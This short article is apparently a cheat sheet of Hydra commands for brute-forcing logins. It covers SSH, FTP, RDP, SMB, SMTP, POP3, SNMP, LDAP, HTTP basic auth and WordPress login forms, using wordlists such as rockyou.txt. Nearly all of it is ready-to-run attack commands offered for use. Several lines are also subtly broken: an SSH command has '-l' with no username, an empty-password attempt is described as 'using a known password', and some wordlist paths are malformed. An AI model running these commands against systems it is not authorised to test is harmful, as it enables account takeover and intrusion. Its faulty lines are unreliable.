Back

Article: Hydra Cheatsheet


Hydra is a password cracking tools which can be efficiently used against different services like HTTP, SMTP, POP3 or SSH.

Command Description
hydra -P password-file.txt -v $ip snmp Bruteforce against SNMP
hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp Bruteforce against FTP
hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh Bruteforce against SSH
hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh Bruteforce against SSH using a known password
hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh Bruteforce against SSH using a list of passwords
hydra $ip -s 22 ssh -l -P big_wordlist.txt Bruteforce against SSH on a specific port
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V Bruteforce against POP3
hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V Bruteforce against SMTP
hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin Bruteforce against HTTP Authentication on a specific path
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip Bruteforce against RDP (Windows Remote Desktop)
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb Bruteforce against SMB
hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' Bruteforce against WordPress
hydra -L users.txt -P passwords.txt $ip ldap2 -V -f Bruteforce against LDAP